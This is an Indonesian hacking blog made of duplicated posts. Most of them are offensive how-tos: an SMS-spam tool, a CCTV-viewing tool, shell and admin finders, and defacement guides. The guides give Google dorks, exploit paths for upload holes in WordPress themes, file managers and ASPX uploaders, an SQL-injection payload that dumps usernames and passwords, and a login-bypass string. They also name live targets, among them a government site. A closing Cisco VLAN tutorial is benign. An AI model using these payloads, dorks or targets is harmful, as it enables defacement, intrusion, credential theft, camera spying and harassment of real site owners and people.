I Love Nusantara In Indonesia People !
Copy Right ByNoesantara9etar
Link Script Deface ( disini )
5 Teknik Dasar Social Egineering
Nah, social enggineering sendiri memiliki lima teknik yang paling populer. Berikut jenis-jenisnya.
1. Phishing
Teknik phishing ini merupakan taktik penipuan yang paling sering digunakan sekarang ini. Beberapa penipuan Phishing digunakan untuk mendapatkan informasi personal seseorang seperti nama, alamat dan nomor keamanan sosial.
Selain itu, bisa juga dengan cara mengatasnamakan situs resmi seperti PayPal, Facebook atau situs lain yang mengharuskan seseorang untuk memasukkan email dan password, padahal sebenarnya situs tersebut adalah buatan si hacker.
Dengan cara ini hacker mendapatkan semua data yang diperlukan untuk mengambil alih akun seseorang.
2. Pretexting
Taktik pretexting ini adalah teknik yang digunakan hacker dengan cara berbicara layaknya para ahli. Hacker yang kita ketahui sangat mahir dalam hal teknis, tapi ketika hacker menggunakan social engineering, maka hacker bisa berbicara sangat lancar seperti seorang ahli.
Seperti Gamble yang mengaku bahwa sebagai Brennan untuk mengakses komputernya, ketika menelepon CIA. Itu berarti Gamble bisa sangat meyakinkan petugas CIA bahwa dia adalah Brennan yang asli.
3. Baiting
Baiting adalah teknik yang hampir sama seperti Phishing, yaitu memberikan pancingan berupa hadiah barang atau hal-hal yang menarik korban untuk membuka situs yang dibuat hacker.
Baiting kebanyakan menawarkan korbannya musik gratis atau unduhan film, termasuk film porno, dengan kecepatan yang lebih cepat. Setelah mengklik situs tersebut, korban harus memasukkan email dan password mereka.
4. Quid Pro Quo
Secara harfiah, Quid Pro Quo berarti 'sesuatu untuk sesuatu'. Konsep ini menjanjikan korban keuntungan yang sama yang akan mereka dapatkan dari informasi yang mereka berikan.
Taktik ini paling umum dilakukan oleh hacker yang berpura-pura menjadi orang layanan IT dan menelpon sebanyak-banyaknya orang dari perusahaan yang dapat mereka temukan.
Hacker ini akan menawarkan bantuan kepada korbannya dengan menjanjikan perbaikan sistem IT yang lebih cepat dengan catatan perusahaan harus menonaktifkan program AV mereka untuk melakukan perbaikan tersebut.
Lebih parahnya, hacker dengan taktik ini bisa jadi memiliki kemampuan yang lebih baik daripada orang layanan IT sungguhan.
5. Tailgating
Beberapa orang mengenal istilah Tailgating ini dengan Piggyback. Taktik ini dilakukan dengan cara menguntit seseorang yang memiliki otentikasi, seperti karyawan perusahaan untuk masuk ke area yang tidak bisa diakses orang asing.
Biasanya, pelaku tailgating, akan meniru kurir pengirim barang dan menunggu di luar gedung. Ketika seorang karyawan yang memiliki akses untuk masuk ke dalam area tersebut membuka pintu masuk, pelaku akan mengikutinya dengan menahan pintu itu lalu masuk ke dalam gedung.
Sumber : Kumparan.com
~Mr.FBSN./404
Rilis Tools Spam Sms Simcard 3 Work !
Yoo Yooo Yooo Whatsappp My friends :v
Udah lama mimin gak update nih blog :D Yaa Maklum Sibuk Muluu Lah :D
Yaaa Mimin kali ini mau share gimana cara spam sms simcard / kartu 3 (khusus pengguna kartu 3)
Okeee Lanjut Ini Bisa Pakek Termux / Terminal yak
Cara Gunain :
1 . Edit dulu nomer yg akan kita mass spam !
( DISINI W MAU MASS SPAM SMS DALAM SATU NOMER )
w spam 8 sms nanti 8 sms akan masuk ke hp korban
kalo udah di save ctrl + x >> y
2. Buka spantri.py nya
Buka Tuh Toolsnya Caranya
$python spantri.py
abis itu enter maka akan menampilkan gini
3. Masukan Path file list.txtnya
karena file list.txtnya dalam satu folder jadi kita tinggal ketik
[*] List >> list.txt
Setelah itu dia akan langsung Mengkhitung jumlah pesan yg ada di list.txt dan langsung mengirim pesan tanpa delay
Okee mungkin itu aja dari mimin kali ini
Masih Bingung ? Cek Youtube Ku Mhankkk ;*
Link Download Script : Klik Me Senpai ;*
Youtube : Klik Me Senpai ;*
Udah lama mimin gak update nih blog :D Yaa Maklum Sibuk Muluu Lah :D
Yaaa Mimin kali ini mau share gimana cara spam sms simcard / kartu 3 (khusus pengguna kartu 3)
Okeee Lanjut Ini Bisa Pakek Termux / Terminal yak
Cara Gunain :
1 . Edit dulu nomer yg akan kita mass spam !
( DISINI W MAU MASS SPAM SMS DALAM SATU NOMER )
w spam 8 sms nanti 8 sms akan masuk ke hp korban
kalo udah di save ctrl + x >> y
2. Buka spantri.py nya
Buka Tuh Toolsnya Caranya
$python spantri.py
abis itu enter maka akan menampilkan gini
3. Masukan Path file list.txtnya
karena file list.txtnya dalam satu folder jadi kita tinggal ketik
[*] List >> list.txt
Setelah itu dia akan langsung Mengkhitung jumlah pesan yg ada di list.txt dan langsung mengirim pesan tanpa delay
Okee mungkin itu aja dari mimin kali ini
Masih Bingung ? Cek Youtube Ku Mhankkk ;*
Link Download Script : Klik Me Senpai ;*
Youtube : Klik Me Senpai ;*
Tutorial Deface POC Kawaii FIle Hosting Simple
Yoo Yooo Yooo Whatsappp My friends :v
Udah lama mimin gak update nih blog :D Yaa Maklum Sibuk Muluu Lah :D
Okeee Kali ini mimin mau share nih gimana cara deface POC Kawaii File Hosting. Ini simple kok gak susah.
Langsung aja gan
=====================
Nahh Setelah itu upload script lu yg berekstensi ".phtml"
Dah ke upload tuh sekarang tinggal klik linkny aja
Andd booommm !!!!
Masih bingung ? Tenang W ada link youtubenya kok jangan lupa nih like,komen,share, and subscribe yakk :*
Klik Disini Mhamank link ke yt ;*
Udah lama mimin gak update nih blog :D Yaa Maklum Sibuk Muluu Lah :D
Okeee Kali ini mimin mau share nih gimana cara deface POC Kawaii File Hosting. Ini simple kok gak susah.
Langsung aja gan
=====================
Dork: "Kawaii File Host"
"Kawai File Hosting"
Exp : Gada
EXT : .phtml
=====================
Searcing gan
Pilih salah satu gan Langsung Buka Nih
Nahh Setelah itu upload script lu yg berekstensi ".phtml"
Dah ke upload tuh sekarang tinggal klik linkny aja
Andd booommm !!!!
Masih bingung ? Tenang W ada link youtubenya kok jangan lupa nih like,komen,share, and subscribe yakk :*
Klik Disini Mhamank link ke yt ;*
Tools Admin Finder
Assalamu alaikum Wr Wb.
Kali ini Mimin yang gans ini Ingin Memberi Tools Admin Finder
Ya ini Dia Software / Tols nya Ya gan
Tols Atau Software nya Bisa Di Download Gambar Di bawah ini
Sekian Dan Terima Kasih Semoga Bermanfaat ya Gans
Salam BekasiSec
Thnks Admin BekasiSec
-Mr.FBSN./404
-Nii-San Hexor
Kali ini Mimin yang gans ini Ingin Memberi Tools Admin Finder
Tools ini sangat bermanfaat bagi kalian yang tidak mengetahui adminweb pada salah satu website.
Ya ini Dia Software / Tols nya Ya gan
Lalu...... bagaimana cara untuk menggunakannya ..?
pada kolom
1.yang tertulis http://www.contoh.com/ ganti
2.kemudian masukkan alamat website target kalian,
3. kemudian Star Scan dan tunggu sampai muncul Hasilnya
yang ada pada sebelah kiri
1.yang tertulis http://www.contoh.com/ ganti
2.kemudian masukkan alamat website target kalian,
3. kemudian Star Scan dan tunggu sampai muncul Hasilnya
yang ada pada sebelah kiri
kemudian bagi yang ingin mempercepat hasil Scannya tinggal ganti intervalnya saja, dengan cara pilih Setting kemudian ganti intervalnya disitu sudah tertulis interval minimum 50.
Salam BekasiSec
Thnks Admin BekasiSec
-Mr.FBSN./404
-Nii-San Hexor
Release News Tools ShellFinder [CLI]
Yoooooo Gaann :V
udah lama mimin gak update nih blog :v biasa sibuk teroos lah haha :v
okee langsung aja yaa
Disini Mimin Udah Buat Tools Shell Finder Yaaa sama kek admin finder sih tapi shell finder kali ini pakek mode CLI / Command Line Interface . Bisa Kok Di Termux hehe .
[ SHELL FINDER ]
Coded By : Nii-san Haxor
Programming Language : Python3
Tested On : KaliLinux,MacOSX,Termux
Cara Pakeknya Hampir Mirip Kek SQLMAP
NB : KALIAN BOLEH NAMBAHIN WORDLISTNYA !
python3 shell.py -u [url] -w [wordlist.txt]
abis itu enter dan lihat apa yg terjadi
Ingin Mencobanya ?
Langsung aja
Termux :
$apt-get install python3
$git clone https://github.com/arifarhan16/shellFin.git
$cd shellFin
$chmod +x shell.py
$python3 shell.py -u [url] -w [wordlist.txt]
Linux :
#git clone https://github.com/arifarhan16/shellFin.git
#cd shellFin
#chmod +x shell.py
#./shell.py -u [url] -w [wordlist.txt]
Bingung ? Lihat Di SINI
udah lama mimin gak update nih blog :v biasa sibuk teroos lah haha :v
okee langsung aja yaa
Disini Mimin Udah Buat Tools Shell Finder Yaaa sama kek admin finder sih tapi shell finder kali ini pakek mode CLI / Command Line Interface . Bisa Kok Di Termux hehe .
[ SHELL FINDER ]
Coded By : Nii-san Haxor
Programming Language : Python3
Tested On : KaliLinux,MacOSX,Termux
NB : KALIAN BOLEH NAMBAHIN WORDLISTNYA !
python3 shell.py -u [url] -w [wordlist.txt]
abis itu enter dan lihat apa yg terjadi
Ingin Mencobanya ?
Langsung aja
Termux :
$apt-get install python3
$git clone https://github.com/arifarhan16/shellFin.git
$cd shellFin
$chmod +x shell.py
$python3 shell.py -u [url] -w [wordlist.txt]
Linux :
#git clone https://github.com/arifarhan16/shellFin.git
#cd shellFin
#chmod +x shell.py
#./shell.py -u [url] -w [wordlist.txt]
Bingung ? Lihat Di SINI
Cara Hack CCTV Mudah Menggunakan Terminal / Termux !
Yoooo Gaaan :v
Udah Lama mimin gak update blog :v ya biasa mimin sibuk neh :v biasa hehe
okeeeyyy sebelumnya apa kabar :v
udah yok lanjut
yooshh sekarang mimin mau share gimana cara hack cctv menggunakan terminal / termux mudah kok :v
okeeyy lanjut kita download apa yg kita butuhkan terlebih dahulu
Termux :
Cara Gunainnya Gampang Koq
1.Masuk ke direktori ipcams
Syntax : $ cd ipcams
2. Jalankan
syntax : $python2 sc.py
Nanti Tampilannya Seperti Itu Hehe
Nah Jika sudah seperti itu pilih nomer negara yg kalian ingin hack
Disini mimin mau pilih nomer 2 yaitu indonesia
Nb. Jika Ketika Memilih Kemudian Blank gak keluar apa apa biarkan saja itu tandanya proses hack sedang dilakukan
and then
Okeeyy Jika gini udah ada beberapa cctv yg telah kita hack
and kita pilih page berapa yg mau kita buka videonya ( video 100% real )
OKEEYYY
next
jika setelah memasukan page yg udah kita hack tadi tinggal nanti akan keluar ip address cctv yg berhasil kita hack
ang langkah yg terakhir copy link tersebut ke google chrome / aplikasi peramban kalian and lihat apa yg terjadi......
Jika KURANG JELAS Klik Link INI
Udah Lama mimin gak update blog :v ya biasa mimin sibuk neh :v biasa hehe
okeeeyyy sebelumnya apa kabar :v
udah yok lanjut
yooshh sekarang mimin mau share gimana cara hack cctv menggunakan terminal / termux mudah kok :v
okeeyy lanjut kita download apa yg kita butuhkan terlebih dahulu
Termux :
- apt update
- apt upgrade
- pkg install python2
- pkg install git
- pip2 install requests
- git clone https://github.com/arifarhan16/ipcams.git
- ls
- cd ipccams
- python2 sc.py
- git clone https://github.com/arifarhan16/ipcams.git
- ls
- cd ipccams
- python2 sc.py
Cara Gunainnya Gampang Koq
1.Masuk ke direktori ipcams
Syntax : $ cd ipcams
2. Jalankan
syntax : $python2 sc.py
Nah Jika sudah seperti itu pilih nomer negara yg kalian ingin hack
Disini mimin mau pilih nomer 2 yaitu indonesia
Nb. Jika Ketika Memilih Kemudian Blank gak keluar apa apa biarkan saja itu tandanya proses hack sedang dilakukan
and then
and kita pilih page berapa yg mau kita buka videonya ( video 100% real )
OKEEYYY
next
ang langkah yg terakhir copy link tersebut ke google chrome / aplikasi peramban kalian and lihat apa yg terjadi......
Jika KURANG JELAS Klik Link INI
Tutorial Deface ORANGE_THEMES !
Yoo gan :V
kembali lagi sama w :v admin gans :V
nah kali ini mimin mau share new method deface wordpess yaitu ORANGE_THEMES
Okee Langsung aja yaa :v
Dork :
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
Exp :
/functions/upload-handler.php
Langsung aja gayn
kembali lagi sama w :v admin gans :V
nah kali ini mimin mau share new method deface wordpess yaitu ORANGE_THEMES
Okee Langsung aja yaa :v
Dork :
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
Exp :
/functions/upload-handler.php
Langsung aja gayn
Tambahkan exploit sesudah /themes/nama path/
Jika Error Berarti VULN
Note :: VULN BELUM TENTU BISA UPLOAD SHELL
Ooke Lanjut Buka CSRF Onlain:V
udah w buat secara ONLAIN :v
Oke abis itu copy Linknya
Abis Itu Masukin Link yg ada error tadi dalam Textbox URL Dan Masukan Tipenya orange_themes!
Setelah Itu Klik LOCK !
Abis itu Akan Ada Uploader Muncul
Nah Pada Bagian Ini Terserah Kalian Mau UPLOAD SHELL / Script Deface
mimin mau up script deface aja :v h3h3
Abis Itu ....
Akan Muncul Begini..
Jika Menampilkan Gini Berarti Shell / Script Kita Telah Terupload sempurna
eitss ingat GAK SETIAP WEB VULN BISA DI UPLOAD SHELL
Oke langsung aja cara aksesnya
WWW.SITE.COM/wp-content/uploads/TAHUN DIAPLOAD/BULAN DI UPLOAD/nama script.html atau shell.php
ingat Pada bagian ini
Setelah /Uploads itu tahun ketika kalian upload shell/ script kalian
dan setelah Tahun yaitu bulan, sama seperti tahun kapan kalian upload
Dan Setelah Bulan Ada nama script / shell
nah pada bagian ini kalian harus ingat nama yg tadi setelah di CSRF
Terimakasih onii chan >///<
Jangan Lupa Follow :)
Kurang Jelas ? Bisa Lihat Video Ini Klik Link Disebelah KLIK DISINI
Deface Method ASPX Uploader v1.0
Yoooo gan :V ketemu lagi sama mimin :v
kali ini mimin bakal share nih gimana cara deface ASPX Uploader + Up Shell
Nah Langsung aja yg dibutuhkan yaitu
1. Shell Backdoor
2. Kopi ( BIAR GAK BOSEN GAYN )
3. Otak :V
Oke
Dork :
"Powered By ES.JO"
inurl:/user_site/site/
Exp :
/Admin_Site/upload/Ahmadupload.aspx
File Access SHELL :
/Admin_Site/upload/files/[shellmu] ( .php / .asp )
Nb . Ingat Gak Semua Web ASPX ada Ahmadupload.aspx
Tq Gayn :V
Kali ini blom ada videonya gayn :V Jadi Yaaa Sabar :V
kali ini mimin bakal share nih gimana cara deface ASPX Uploader + Up Shell
Nah Langsung aja yg dibutuhkan yaitu
1. Shell Backdoor
2. Kopi ( BIAR GAK BOSEN GAYN )
3. Otak :V
Oke
Dork :
"Powered By ES.JO"
inurl:/user_site/site/
Exp :
/Admin_Site/upload/Ahmadupload.aspx
File Access SHELL :
/Admin_Site/upload/files/[shellmu] ( .php / .asp )
Nb . Ingat Gak Semua Web ASPX ada Ahmadupload.aspx
Tq Gayn :V
Kali ini blom ada videonya gayn :V Jadi Yaaa Sabar :V
Deface Shopping Bypass Admin Login Page
OKee gayn kembali lagi sama mimin :v
kali ini mimin mau share nih cara deface Shopping Bypass Adlog :V
ya methodnya sama seh kyak bepas admin oke lanjut
DOrk :
inurl:/admin/insert-product.php
inurl:/admin/update-image1.php?id=1
inurl:/admin/productimages
Cari Admin Loginnya
And
masukan username and passwordnya : '=''or' [atau] admin
OKee Sekian Dari Mimin gayn >///<
kali ini mimin mau share nih cara deface Shopping Bypass Adlog :V
ya methodnya sama seh kyak bepas admin oke lanjut
DOrk :
inurl:/admin/insert-product.php
inurl:/admin/update-image1.php?id=1
inurl:/admin/productimages
Cari Admin Loginnya
And
masukan username and passwordnya : '=''or' [atau] admin
OKee Sekian Dari Mimin gayn >///<
Realease Tools Reverse IP !
Okee gayn :"v kembali lagi sama w mimin gans :V
nah kali ini mimin mau share nih ada tools baru yg mimin buat :v
okee nama toolsnya itu ResVIp gunanya untuk Melihat IP web mana yg sama dengan web yg lainnya.
Tools Ini Menggunakan API dari ViewDns.info
OKee ini dia tampilannya
Yaps Ini Dia Toolsnya Berbasis Shell Bash / CLI
Cara gunainnya ada kok di toolsnya
Cara Installnya Itu Gampang kok
Btw Bisa Di Gunain Di Termux kok
Termux
=====
$git clone https://github.com/arifarhan16/resvip
$cd resvip
$python resvip.py [nama domain]
Linux ? Pasti Udah Pada tau kan Buat installnya dari github :v hehe
yaudah mungkin itu saja dari w
untuk cara penggunaannya bisa liat video :
Btw Kalo Suara Mimin Jelek Maap :v Karena Mimin lagi sakit :v
https://www.youtube.com/watch?v=ieDeBDPPAT0
Thx Onii-chan >///<
nah kali ini mimin mau share nih ada tools baru yg mimin buat :v
okee nama toolsnya itu ResVIp gunanya untuk Melihat IP web mana yg sama dengan web yg lainnya.
Tools Ini Menggunakan API dari ViewDns.info
OKee ini dia tampilannya
Yaps Ini Dia Toolsnya Berbasis Shell Bash / CLI
Cara gunainnya ada kok di toolsnya
Cara Installnya Itu Gampang kok
Btw Bisa Di Gunain Di Termux kok
Termux
=====
$git clone https://github.com/arifarhan16/resvip
$cd resvip
$python resvip.py [nama domain]
Linux ? Pasti Udah Pada tau kan Buat installnya dari github :v hehe
yaudah mungkin itu saja dari w
untuk cara penggunaannya bisa liat video :
Btw Kalo Suara Mimin Jelek Maap :v Karena Mimin lagi sakit :v
https://www.youtube.com/watch?v=ieDeBDPPAT0
Thx Onii-chan >///<
Deface SQLI-LOKOMEDIA
Okeee gaynn kembali lagi sama mimin yg gans ini :V
kali ini mimin mau ngeshare gimana cara deface SQLI-LOKOMEDIA
mudah kok gak sampe pusing :V
okee langsung aja
Dork : - inurl:statis-1-profil.html - inurl:statis-2-profil.html - inurl:statis-3-strukturorganisasi.html - inurl:hal-tentang-kami.html - inurl:statis-1-pengantar.html - inurl:statis-19-beasiswa.html - inurl:statis-22-kerjasama.html Exploit : 'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ Cari Admin Login Dengan Admin Finder Punya w : $git clone https://github.com/arifarhan16/adfin.git Jika Admin Login Tak Ketemu Udah Ganti Target ae :v
http://sitepemerintah.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
BINUNG ? KLIK INI BIAR PAHAM
kali ini mimin mau ngeshare gimana cara deface SQLI-LOKOMEDIA
mudah kok gak sampe pusing :V
okee langsung aja
Dork : - inurl:statis-1-profil.html - inurl:statis-2-profil.html - inurl:statis-3-strukturorganisasi.html - inurl:hal-tentang-kami.html - inurl:statis-1-pengantar.html - inurl:statis-19-beasiswa.html - inurl:statis-22-kerjasama.html Exploit : 'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ Cari Admin Login Dengan Admin Finder Punya w : $git clone https://github.com/arifarhan16/adfin.git Jika Admin Login Tak Ketemu Udah Ganti Target ae :v
Bingung cara ngexploit nya ?? sini di kasih tau :v
contoh :
http://sitepemerintah.co.li/statis-2-profil.html
kamu tambahin exploit nya sesudah angka jadi kaya gini :
BINUNG ? KLIK INI BIAR PAHAM
Google Translate Terhack ?! XSS
Yoo Gaann Kembali lagi sama mimin :V
Sekarang mimin mau share cara hack google translate bug :V
XSS Method
OKee langsung aja
Buka google translatenya
Sudah Terbuka ?
klik Document / Dokumen
Jika Sudah nanti akan tampil uploader klik uploadernya
kemudian kalian aplod script deface kalian dalam format txt
Sebelum upload script deface kalian pilih bahasa yg akan diterjemahkan menjadi bahasa inggris dulu :v
Okee setelah udah di upload klik "TERJEMAHKAN"
and.......
Lihat apa yg terjadi ....
BOOMMM!!!!
Selamat anda telah menghack google :v
untuk lebih jelasnya silahkan lihat video : KLIK
Sekarang mimin mau share cara hack google translate bug :V
XSS Method
OKee langsung aja
Buka google translatenya
Sudah Terbuka ?
klik Document / Dokumen
kemudian kalian aplod script deface kalian dalam format txt
Sebelum upload script deface kalian pilih bahasa yg akan diterjemahkan menjadi bahasa inggris dulu :v
Okee setelah udah di upload klik "TERJEMAHKAN"
and.......
Lihat apa yg terjadi ....
BOOMMM!!!!
Selamat anda telah menghack google :v
untuk lebih jelasnya silahkan lihat video : KLIK
Deface Front-End Register New Method 2019
OKeee Gaaan :V
Kembali lagi sama w mimin gans :V
kali ini mimin mau share nih ada new method deface 2019 yaitu deface Methode
Front-End Register mudah kok
Okeee langsung sadja
Dork : inurl:"/index.php/frontend/login/en" site:[.com/.net/ ] Kembangin sendiri
Expolit : /index.php/frontend/login/en
okee disini mimin ada target
live target : http://www.zshop.co.uk/
Masukan exploit sesudah nama web
contoh : www.target.co.li/index.php/frontend/login/en
OKeee paham yaa
kalo udah masukin exploit kita akan dibawa ke halaman pendaftaran dan halaman login
Sebelumnya kita daftar dulu okee [ asal asalan aja ]
jika sudah daftar login lah :V
udah ? okee langsung masuk kan
setelah masuk gitu kita klik bagian atas yg namanya My Profiles
udah masuk ??
okee kita seret kebawah dan ada tempat upload
okeee itu yg warna ijo kita upload [ hanya bisa .txt saja ]
setelah terupload cara aksesnya
www.namaweb.co.li/files/namafiles.txt
Kembali lagi sama w mimin gans :V
kali ini mimin mau share nih ada new method deface 2019 yaitu deface Methode
Front-End Register mudah kok
Dork : inurl:"/index.php/frontend/login/en" site:[.com/.net/ ] Kembangin sendiri
Expolit : /index.php/frontend/login/en
okee disini mimin ada target
live target : http://www.zshop.co.uk/
Masukan exploit sesudah nama web
OKeee paham yaa
kalo udah masukin exploit kita akan dibawa ke halaman pendaftaran dan halaman login
Sebelumnya kita daftar dulu okee [ asal asalan aja ]
jika sudah daftar login lah :V
udah ? okee langsung masuk kan
udah masuk ??
okee kita seret kebawah dan ada tempat upload
okeee itu yg warna ijo kita upload [ hanya bisa .txt saja ]
setelah terupload cara aksesnya
www.namaweb.co.li/files/namafiles.txt
Tutorial Deface RFM Web Pemerintahan
OKeeee gaaan :V
ketemu lagi sama mimin :V kali ini mimin bakal ngeshare gimana cara deface website pemerintahan menggunakan methode RFM ( RESPONSIF FILE MANAGER )
okee langsung aja gan
Live Target : http://sikarep.pekalongankota.go.id
Dork :
>> inurl:/filemanager/ site:[com/net/go.id]
>> inurl:/assets/js/filemanager/ site:[com/net/go.id]
Cari dialog.php
Masuk Ke Live Target
Kalian Akan Masuk Ke Sini
Jika Sudah Masuk Tinggal Kita Lihat Ke Pojok Atas Kiri Ada Gambar Tanda Panah Ke Atas Kita Klik
Akan Muncul Tampilan Seperti Ini
Klik Tombol Warna Hijau untuk memilih file yg akan kalian up
Setelah itu kalian klik start upload Jika Berhasil Maka Akan Ada Tanda Centang / Ceklis OKeee
Mungkin Itu Aja Dari Mimin Kurang Lebihnya Silahkan Belajar Sendiri Okee :)
Thx Telah Berkunjung Onii-Chan >///<
ketemu lagi sama mimin :V kali ini mimin bakal ngeshare gimana cara deface website pemerintahan menggunakan methode RFM ( RESPONSIF FILE MANAGER )
okee langsung aja gan
Live Target : http://sikarep.pekalongankota.go.id
Dork :
>> inurl:/filemanager/ site:[com/net/go.id]
>> inurl:/assets/js/filemanager/ site:[com/net/go.id]
Cari dialog.php
Masuk Ke Live Target
http://sikarep.pekalongankota.go.id/assets/js/filemanager/filemanager/
Klik Dialog.phpKalian Akan Masuk Ke Sini
Jika Sudah Masuk Tinggal Kita Lihat Ke Pojok Atas Kiri Ada Gambar Tanda Panah Ke Atas Kita Klik
Akan Muncul Tampilan Seperti Ini
Setelah itu kalian klik start upload Jika Berhasil Maka Akan Ada Tanda Centang / Ceklis OKeee
Mungkin Itu Aja Dari Mimin Kurang Lebihnya Silahkan Belajar Sendiri Okee :)
Thx Telah Berkunjung Onii-Chan >///<
Tutorial Deface SCH ID menggunakan Martabak Tools
OKee ketemu lagi sama mimin :V kali ini mimin mau ngeshare tutor gimana cara deface sch id sql-injection.
Yaa sesuai dengan judul mimin bakal pakek tools punya si Cy#b3r00T yaitu tools Martabak Auto Sql-i Balitbang
OKee ini dia tampilannya gan
yaa gampang sama aja pakek sqli-dios tinggal masukin target klik inject
tunggu aja dan boom bakal tampil okeee :*
Ini Yg Mau Toolsnya
https://pastebin.com/P1LSSwqy
Thx
===========
IndoSec
BekasiSec
Sora Cyber Team
AnarchoXploit
==========
Yaa sesuai dengan judul mimin bakal pakek tools punya si Cy#b3r00T yaitu tools Martabak Auto Sql-i Balitbang
OKee ini dia tampilannya gan
tunggu aja dan boom bakal tampil okeee :*
Ini Yg Mau Toolsnya
https://pastebin.com/P1LSSwqy
Thx
===========
IndoSec
BekasiSec
Sora Cyber Team
AnarchoXploit
==========
Cli Browser By BekasiSec Ft IndoSec
Yoo Gaan :V Bertemu Lagi Sama w Mimin Gans >///<
Kali ini mimin mau share nih Tools CLI-Browser bisa nih yg lg ngirit kuota :v
Yookk langsung aja nih buktinya
Linux / Termux / Gitbash Bisa Kok :)
Langsung Aja
$git clone https://github.com/arifarhan16/clibrowser.git
Jika Sudah di download masuk dalam foldernya
$cd clibrowser
jika sudah masuk, kita ubah permissionnya caranya
$chmod +x setup.sh
( INGET YG DI CHMOD ITU CUMA SETUP.SH ! )
jika sudah kita buka yg satunya caranya
$sh browser.sh
Abis itu enter
UNTUK CARA PENGGUNAAN SILAHKAN EXPLORASI SENDIRI ;v
#jangancopas
#hekerkokcopas
#hekerkokbutaprogram
Selamat menggunakan :)
Kali ini mimin mau share nih Tools CLI-Browser bisa nih yg lg ngirit kuota :v
Yookk langsung aja nih buktinya
Langsung Aja
$git clone https://github.com/arifarhan16/clibrowser.git
Jika Sudah di download masuk dalam foldernya
$cd clibrowser
jika sudah masuk, kita ubah permissionnya caranya
$chmod +x setup.sh
( INGET YG DI CHMOD ITU CUMA SETUP.SH ! )
jika sudah kita buka yg satunya caranya
$sh browser.sh
UNTUK CARA PENGGUNAAN SILAHKAN EXPLORASI SENDIRI ;v
#jangancopas
#hekerkokcopas
#hekerkokbutaprogram
Selamat menggunakan :)
Cara Membuat Vlan Pada Perangkat Cisco
OKeee gan :V Kembali Lagi Sama w admin gans :v kali ini mimin bakal kasih tau gimana cara buat VLAN di cisco Packet Tracer OKeee :v
Langsung Buka Cisco Packetnya.
Yang Kita Butuhkan :
1. Kopi ( Gak Penting Sih :V )
2. Aplikasi Cisco Packet Tracer
3. Niat ( Karena Dari Niat Kita Bisa Melakukan Sesuatu )..
OKee langsung saja.\
1. Buat Topologi seperti gambar di bawah :
Langsung Buka Cisco Packetnya.
Yang Kita Butuhkan :
1. Kopi ( Gak Penting Sih :V )
2. Aplikasi Cisco Packet Tracer
3. Niat ( Karena Dari Niat Kita Bisa Melakukan Sesuatu )..
OKee langsung saja.\
1. Buat Topologi seperti gambar di bawah :
- Sambungkan Server0, PC0, PC1 ke switch dengan port fastethernet 0/2, 0/3, 0/4 dan untuk Server1, PC2, PC3 ke switch dengan port fastethernet 0/22, 0/23, 0/24. Hal tersebut supaya untuk mempermudah dalam pembagian VLAN port di langkah selanjutnya.
-
Membuat VLAN IDklik pada switch cisco dan pilih CLI dan ketikkan perintah di bawahSwitch> enableSwitch# vlan databaseSwitch(vlan)# vlan 10 name Div_1Switch(vlan)# vlan 20 name Div_2Switch(vlan)# exitDalam pembuatan VLAN ID dapat membuatnya dengan angka bebas antara 1-1000, dan untuk melihat apakah pembuatan ID sudah berhasil atau belum bisa di ketikkan dengan perintahSwitch# show vlan br
Jika tampilan seperti gambar di atas terutama yang di kotak merah berarti pembuatan VLAN ID sudah berhasil.
-
Langkah selanjutnya yaitu mengkonfigurasi tiap port fastethernet agar nanti dapat terhubung ke VLAN yang sudah dibuat. Caranya ketikkan perintah di bawah
Switch> enable
Switch# configure terminal
Switch(config)# int fa 0/2
Switch(config-if)# switchport access vlan 10
Switch(config-if)# exit
Switch(config)# int fa 0/3
Switch(config-if)# switchport access vlan 10
Switch(config-if)# exit
Switch(config)# int fa 0/4
Switch(config-if)# switchport access vlan 10
Switch(config-if)# exit
Lakukan hal yang sama jika port akan di masukkan dalam vlan 10 -
Masukkan juga pada port yang akan terhubung ke vlan 20 dengan cara berikutSwitch> enableSwitch# configure terminalSwitch(config)# int fa 0/22Switch(config-if)# switchport access vlan 20Switch(config-if)# exitSwitch(config)# int fa 0/23Switch(config-if)# switchport access vlan 20Switch(config-if)# exitSwitch(config)# int fa 0/24Switch(config-if)# switchport access vlan 20Switch(config-if)# exitlihat dengan perintah show vlan, maka akan terlihat pembagian port berapa saja berdasarkan VLAN ID.
-
Kemudian untuk memberikan IP Address kita bisa setting Server dengan DHCP, agar masing-masing PC Client bisa mendapat IP dengan otomatis. Untuk caranya sudah saya jelaskan di postingan sebelumnya. DHCP dalam metode ini dilakukan untuk menanggulangi kesalahan pemberian IP, karena terdapat lebih dari satu segmen jaringan.
-
Sampai pada langkah ini antar Server dan Client yang berada pada VLAN yang sama sudah bisa terhubung, tetapi belum terhubung jika antar Server. Untuk menghubungkannya kita perlu jembatan penghubung yaitu dengan Router. Colokkan router di switch port 20. Dan masukkan perintahberikut ke Router :
Router> enable
Router# configure terminal
Router(config)# int fa 0/0.10
Router(config-subif)# encapsulation dot1q 10
Router(config-subif)# ip address 192.168.1.10 255.255.255.0
Router(config-subif)# exit
Router(config)# exit
Kemudian setting juga untuk ID 20 dengan perintah
Router> enable
Router# configure terminal
Router(config)# int fa 0/0.20
Router(config-subif)# encapsulation dot1q 20
Router(config-subif)# ip address 172.16.10.10 255.255.255.192
Router(config-subif)# exit
Router(config)# int fa 0/0
Router(config-if)# no shutdown
Router(config-if)# exit
Router(config)# exit
Router# write -
Untuk langkah terakhir yang harus di lakukan agar semua perangkat bisa terhubung yaitu membuat port switch yang terhubung Router menjadi trunk, caranya klik pada switch dan pilih CLI dan masukkan perintah di bawah:Switch> enable
Switch# configure terminalSwitch(config)# interface fa 0/20
Switch(config-if)# switchport mode trunk
Switch(config-if)# exit
